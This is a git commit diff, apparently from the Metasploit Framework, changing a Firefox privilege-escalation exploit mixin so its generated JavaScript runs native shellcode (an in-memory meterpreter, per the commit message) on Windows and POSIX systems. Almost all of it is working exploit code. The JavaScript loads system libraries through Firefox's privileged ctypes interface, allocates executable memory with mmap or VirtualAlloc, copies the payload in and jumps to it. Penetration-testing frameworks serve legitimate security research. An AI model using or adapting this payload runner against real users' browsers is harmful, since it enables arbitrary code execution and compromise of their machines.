All working now. In-memory meterpreter even.

2014-03-12 02:19:28 -05:00 · 2014-03-12 02:19:28 -05:00 · 9bdf570763
parent 26db845438
commit 9bdf570763
1 changed files with 32 additions and 42 deletions
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@ -15,30 +15,26 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
  # @return [String] javascript code containing the execShellcode() javascript fn
  def exec_shellcode_source
    %Q|
-      var execShellcode = function(shellcode) {
-        var LIBS = [
-          "C:\\\\WINDOWS\\\\system32\\\\user32.dll",
-          "/usr/lib/libSystem.B.dylib",
-          "libc.so.6",
-          "libc.so"
-        ];
-
+      var execShellcode = function(shellcode, bytes) {
        Components.utils.import("resource://gre/modules/ctypes.jsm");
-        var openLibs = function(libs) {
-          var i, lib;
-          for (i in libs) {
-            try {
-              lib = ctypes.open(libs[i]);
-              return lib;
-            } catch (e) {}
-          }
-        };
-
-        var lib = openLibs(LIBS);
-        if (!lib) throw new Error("Could not find lib in ["+LIBS+"]");
-
        var execPosix = function() {
          var RWX = 7, ANON_PRIVATE = 4098;
+          Components.utils.import("resource://gre/modules/ctypes.jsm");
+          var LIBS = [
+            "/usr/lib/libSystem.B.dylib",
+            "libc.so.6",
+            "libc.so"
+          ];
+
+          var i, lib;
+          for (i in LIBS) {
+            try {
+              lib = ctypes.open(LIBS[i]);
+              break;
+            } catch (e) {}
+          }
+          if (!lib) throw new Error("Could not find lib in ["+LIBS+"]");
+
          var mmap = lib.declare('mmap',
            ctypes.default_abi,   /* calling convention */
            ctypes.voidptr_t,     /* return type */
@ -56,28 +52,21 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
            ctypes.voidptr_t,     /* src */
            ctypes.size_t         /* size to copy */
          );
-          var pthread_create = lib.declare('pthread_create',
-            ctypes.default_abi,   /* calling convention */
-            ctypes.int,           /* return type */
-            ctypes.voidptr_t,     /* buffer to store thread struct */
-            ctypes.voidptr_t,     /* NULL */
-            ctypes.voidptr_t,     /* fn ptr */
-            ctypes.voidptr_t      /* NULL */
-          );
+
          var buff = mmap(null, shellcode.length, RWX, ANON_PRIVATE, 0, 0);
          var pthread_buff = mmap(null, 4096, RWX, ANON_PRIVATE, 0, 0);
-          var bytes = encodeURI(shellcode).split(/%..\|./).length - 1;
-          memcpy(buff, ctypes.jschar.array()(shellcode), bytes);
+          var cstr = ctypes.jschar.array()(shellcode);
+          //var bytes = ctypes.char.array()(shellcode).length-1;
+          memcpy(buff, cstr, bytes);
          /* there is probably a better way to do this */
          var m = buff.toString().match(/"0x([0-9a-fA-F]*)"/);
          if (!m) throw new Error("Could not find address of buffer.");
-          var fn = ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16));
-          //pthread_create(pthread_buff, )
+          ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
        };

        var execWindows = function() {
          var RWX = 0x40, ANON_PRIVATE = 0x1000;
-          var VirtualAlloc = lib.declare('VirtualAlloc',
+          var VirtualAlloc = ctypes.open("Kernel32.dll").declare('VirtualAlloc',
            ctypes.winapi_abi,    /* calling convention */
            ctypes.voidptr_t,     /* return type */
            ctypes.voidptr_t,     /* start address (NULL here) */
@ -85,22 +74,22 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
            ctypes.unsigned_long, /* alloc type */
            ctypes.unsigned_long  /* protection flags */
          );
-          var memcpy = lib.declare('memcpy',
+          var memcpy = ctypes.open("ntdll.dll").declare('memcpy',
            ctypes.winapi_abi,    /* calling convention */
            ctypes.voidptr_t,     /* return type */
            ctypes.voidptr_t,     /* dest */
            ctypes.voidptr_t,     /* src */
            ctypes.size_t         /* size to copy */
          );
-          var buff = VirtualAlloc(null, shellcode.length, WIN.ANON_PRIVATE, WIN.RWX);
-          var bytes = encodeURI(shellcode).split(/%..\|./).length - 1;
-          memcpy(buff, ctypes.jschar.array()(shellcode), bytes);
+          var buff = VirtualAlloc(null, shellcode.length, ANON_PRIVATE, RWX);
+          var cstr = ctypes.jschar.array()(shellcode);
+          memcpy(buff, cstr, bytes);
          var m = buff.toString().match(/"0x([0-9a-fA-F]+)"/);
          if (!m) throw new Error("Could not find address of buffer.");
-          ctypes.FunctionType(ctypes.default_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
+          ctypes.FunctionType(ctypes.winapi_abi, ctypes.void_t).ptr(parseInt(m[1], 16))();
        };

-        var i, errs = [], fns = [execPosix, execWindows];
+        var i, errs = [], fns = [execWindows, execPosix];
        for (i in fns) {
          try {
            fns[i](shellcode);
@ -116,12 +105,13 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
  # @return [String] javascript source code that kicks off the execution of the payload
  # For a javascript payload, this simply returns the payload source
  # For a native payload, this calls the correct methods to alloc RWX memory and execute shellcode
+  # foreverwhile"\xeb\xfe"
  def run_payload
    return payload.encoded if js_target?
    %Q|
      #{exec_shellcode_source}
-      var sc = unescape("#{Rex::Text.to_unescape("\xcc"+payload.encoded+"\xc3")}");
-      execShellcode(sc);
+      var sc = unescape("#{Rex::Text.to_unescape(payload.encoded)}");
+      execShellcode(sc, #{payload.encoded.bytes.to_a.length});
    |
  end